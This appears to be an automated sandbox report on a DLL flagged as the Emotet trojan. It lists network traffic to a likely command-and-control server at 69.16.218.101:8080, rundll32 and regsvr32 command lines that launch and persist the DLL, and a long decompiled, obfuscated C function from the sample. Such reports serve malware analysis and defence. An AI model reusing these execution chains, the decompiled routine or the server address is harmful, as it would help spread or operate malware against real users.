Jan 14, 2022 10:37:50.062599897 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:50.062751055 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:57.998666048 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:58.128571033 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:58.129226923 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:58.129359961 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:58.136384010 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:37:58.265239954 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:58.791407108 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:37:58.791527987 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:38:01.795819998 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:38:01.795852900 CET	8080	49770	69.16.218.101	192.168.2.6
Jan 14, 2022 10:38:01.795960903 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:39:38.577863932 CET	49770	8080	192.168.2.6	69.16.218.101
Jan 14, 2022 10:39:38.577919006 CET	49770	8080	192.168.2.6	69.16.218.101

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 14, 2022 10:37:49.117140055 CET	8.8.8.8	192.168.2.6	0x3995	No error (0)	windowsupdate.s.llnwi.net		41.63.96.128	A (IP address)	IN (0x0001)

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 7112 Parent PID: 780

General

Start time:	10:37:00
Start date:	14/01/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll"
Imagebase:	0x130000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 7132 Parent PID: 7112

General

Start time:	10:37:01
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1
Imagebase:	0x2a0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 7148 Parent PID: 7112

General

Start time:	10:37:01
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\CSxylfUJcL.dll
Imagebase:	0x830000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.396217963.0000000003230000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 7160 Parent PID: 7132

General

Start time:	10:37:01
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",#1
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.351221459.0000000004C01000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.350955081.0000000004A40000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6172 Parent PID: 7112

General

Start time:	10:37:01
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\CSxylfUJcL.dll,DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354941726.0000000005411000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354572676.0000000005220000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354868089.00000000053E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354398198.00000000051C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354782751.00000000052B1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354142339.0000000005110000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.353774398.0000000004C71000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354700642.0000000005280000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354625308.0000000005251000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354494384.00000000051F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.354257894.0000000005141000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.353590253.0000000004B30000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6048 Parent PID: 7160

General

Start time:	10:37:02
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353899484.00000000047F1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.354039628.0000000004851000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353678279.00000000046C1000.00000020.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353971003.0000000004820000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353601392.0000000004690000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353804496.00000000047C0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.352946917.0000000004060000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.353110002.0000000004191000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5380 Parent PID: 6172

General

Start time:	10:37:05
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Ovttmq\chwg.qvw",xKUTPckNvcwxvZR
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.397064444.0000000002A80000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.397100803.0000000002AD1000.00000020.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 5536 Parent PID: 560

General

Start time:	10:37:22
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 5820 Parent PID: 7148

General

Start time:	10:37:25
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\CSxylfUJcL.dll",DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: rundll32.exe PID: 5132 Parent PID: 5380

General

Start time:	10:37:25
Start date:	14/01/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Ovttmq\chwg.qvw",DllRegisterServer
Imagebase:	0x2d0000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 5952 Parent PID: 560

General

Start time:	10:37:29
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 3452 Parent PID: 560

General

Start time:	10:37:45
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6400 Parent PID: 560

General

Start time:	10:38:03
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6980 Parent PID: 560

General

Start time:	10:38:22
Start date:	14/01/2022
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff6b7590000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: regsvr32.exe PID: 7148 Parent PID: 7112 regsvr32.exeCOMMON

Execution Graph

Execution Coverage:	5.3%
Dynamic/Decrypted Code Coverage:	13.5%
Signature Coverage:	13.8%
Total number of Nodes:	355
Total number of Limit Nodes:	22

Executed Functions

Function 04B9EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E04B9EFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E04B9FE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E04B81A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672); // executed
						E04BA0DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E04B9E1F8(0x4b81160, _v1680, __eflags);
						E04BA2D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x4b81160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E04B9FECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E04B985FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624); // executed
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E04B9E1F8(0x4b81120, _v1700, _t462);
						_t393 = E04BA061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E04B9FECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E04B8C307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x04b9efdd
0x04b9efe3
0x04b9efed
0x04b9eff5
0x04b9effd
0x04b9f005
0x04b9f010
0x04b9f01b
0x04b9f026
0x04b9f038
0x04b9f03d
0x04b9f043
0x04b9f04b
0x04b9f04d
0x04b9f055
0x04b9f05a
0x04b9f06c
0x04b9f071
0x04b9f07a
0x04b9f085
0x04b9f08d
0x04b9f092
0x04b9f097
0x04b9f09f
0x04b9f0a7
0x04b9f0af
0x04b9f0b4
0x04b9f0bc
0x04b9f0c4
0x04b9f0cc
0x04b9f0d4
0x04b9f0d9
0x04b9f0e1
0x04b9f0f3
0x04b9f0f6
0x04b9f0fd
0x04b9f108
0x04b9f113
0x04b9f11b
0x04b9f126
0x04b9f133
0x04b9f137
0x04b9f144
0x04b9f148
0x04b9f150
0x04b9f15b
0x04b9f166
0x04b9f171
0x04b9f179
0x04b9f181
0x04b9f189
0x04b9f191
0x04b9f199
0x04b9f1a6
0x04b9f1aa
0x04b9f1b2
0x04b9f1bd
0x04b9f1c8
0x04b9f1d3
0x04b9f1e6
0x04b9f1ed
0x04b9f1f8
0x04b9f203
0x04b9f210
0x04b9f21b
0x04b9f223
0x04b9f231
0x04b9f236
0x04b9f23c
0x04b9f244
0x04b9f250
0x04b9f255
0x04b9f25b
0x04b9f260
0x04b9f268
0x04b9f270
0x04b9f278
0x04b9f280
0x04b9f288
0x04b9f294
0x04b9f299
0x04b9f29f
0x04b9f2a4
0x04b9f2ac
0x04b9f2b7
0x04b9f2c2
0x04b9f2cd
0x04b9f2d5
0x04b9f2da
0x04b9f2e2
0x04b9f2ea
0x04b9f2f2
0x04b9f2fe
0x04b9f303
0x04b9f309
0x04b9f30e
0x04b9f316
0x04b9f31e
0x04b9f32a
0x04b9f32f
0x04b9f335
0x04b9f33d
0x04b9f345
0x04b9f34d
0x04b9f355
0x04b9f35d
0x04b9f365
0x04b9f36d
0x04b9f378
0x04b9f383
0x04b9f38e
0x04b9f396
0x04b9f39b
0x04b9f3a3
0x04b9f3ab
0x04b9f3bd
0x04b9f3c0
0x04b9f3c7
0x04b9f3d2
0x04b9f3da
0x04b9f3df
0x04b9f3e7
0x04b9f3ef
0x04b9f3f4
0x04b9f3fc
0x04b9f400
0x04b9f408
0x04b9f410
0x04b9f41d
0x04b9f421
0x04b9f429
0x04b9f431
0x04b9f439
0x04b9f441
0x04b9f449
0x04b9f451
0x04b9f459
0x04b9f461
0x04b9f469
0x04b9f476
0x04b9f47a
0x04b9f482
0x04b9f48d
0x04b9f498
0x04b9f4a3
0x04b9f4ab
0x04b9f4b3
0x04b9f4b8
0x04b9f4c0
0x04b9f4c8
0x04b9f4d0
0x04b9f4d8
0x04b9f4e0
0x04b9f4e8
0x04b9f4f2
0x04b9f4f6
0x04b9f4fa
0x04b9f502
0x04b9f50a
0x04b9f512
0x04b9f51f
0x04b9f523
0x04b9f52b
0x04b9f533
0x04b9f53b
0x04b9f540
0x04b9f548
0x04b9f55a
0x04b9f72e
0x04b9f734
0x04b9f735
0x00000000
0x04b9f735
0x04b9f566
0x04b9f6d1
0x04b9f6d3
0x04b9f6d7
0x04b9f70c
0x04b9f70c
0x00000000
0x00000000
0x00000000
0x00000000
0x04b9f6d9
0x04b9f6d9
0x04b9f6d9
0x04b9f6dd
0x00000000
0x00000000
0x04b9f6df
0x04b9f6f4
0x04b9f6f4
0x04b9f6f7
0x04b9f6fa
0x04b9f6fd
0x00000000
0x00000000
0x04b9f6e8
0x04b9f6ec
0x00000000
0x00000000
0x04b9f6ee
0x04b9f6f1
0x04b9f6f1
0x04b9f6f1
0x04b9f6ff
0x04b9f6ff
0x04b9f701
0x04b9f704
0x04b9f704
0x04b9f707
0x04b9f707
0x00000000
0x04b9f6d9
0x04b9f572
0x04b9f62f
0x04b9f64e
0x04b9f653
0x04b9f65c
0x04b9f663
0x04b9f673
0x04b9f6a2
0x04b9f6ab
0x04b9f6bf
0x04b9f6c4
0x04b9f6c7
0x00000000
0x04b9f6c7
0x04b9f57e
0x04b9f760
0x04b9f778
0x04b9f782
0x04b9f782
0x04b9f786
0x04b9f78f
0x04b9f78f
0x04b9f584
0x04b9f58a
0x04b9f590
0x04b9f59c
0x04b9f5a0
0x04b9f5b4
0x04b9f5cb
0x04b9f5d9
0x04b9f5ef
0x04b9f5f7
0x04b9f5fd
0x04b9f602
0x04b9f602
0x04b9f752
0x04b9f758
0x00000000
0x00000000
0x00000000
0x04b9f75e
0x04b9f74b
0x04b9f74d
0x00000000

Strings

HA^, xrefs: 04B9F126
_s, xrefs: 04B9F2E2
y!Nt, xrefs: 04B9F2C2
|t, xrefs: 04B9F1F8
7b>, xrefs: 04B9F4D8
<T, xrefs: 04B9F137
(@, xrefs: 04B9F11B
yY, xrefs: 04B9F270
t[, xrefs: 04B9F01B
yWS, xrefs: 04B9F2CD

Memory Dump Source

Source File: 00000002.00000002.396391037.0000000004B81000.00000020.00000001.sdmp, Offset: 04B80000, based on PE: true

Associated: 00000002.00000002.396379915.0000000004B80000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.396440433.0000000004BA6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4b80000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: 7a61d32f9de845f2412f455b6fff170a235f386c27c77cefd52e76c04f010951
Instruction ID: 6262c0767646c161da28c9cad9142d552ee8d794e00ffb72aa4b03cf1d0dd962
Opcode Fuzzy Hash: 7a61d32f9de845f2412f455b6fff170a235f386c27c77cefd52e76c04f010951
Instruction Fuzzy Hash: 980221725083809FD7A8CF25C48AA5BBBF2FBC5718F10891DE2D986260D7B59959CF03

Uniqueness

Uniqueness Score: -1.00%

Function 04B985FF, Relevance: 5.1, Strings: 4, Instructions: 142
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v@, xrefs: 04B98758
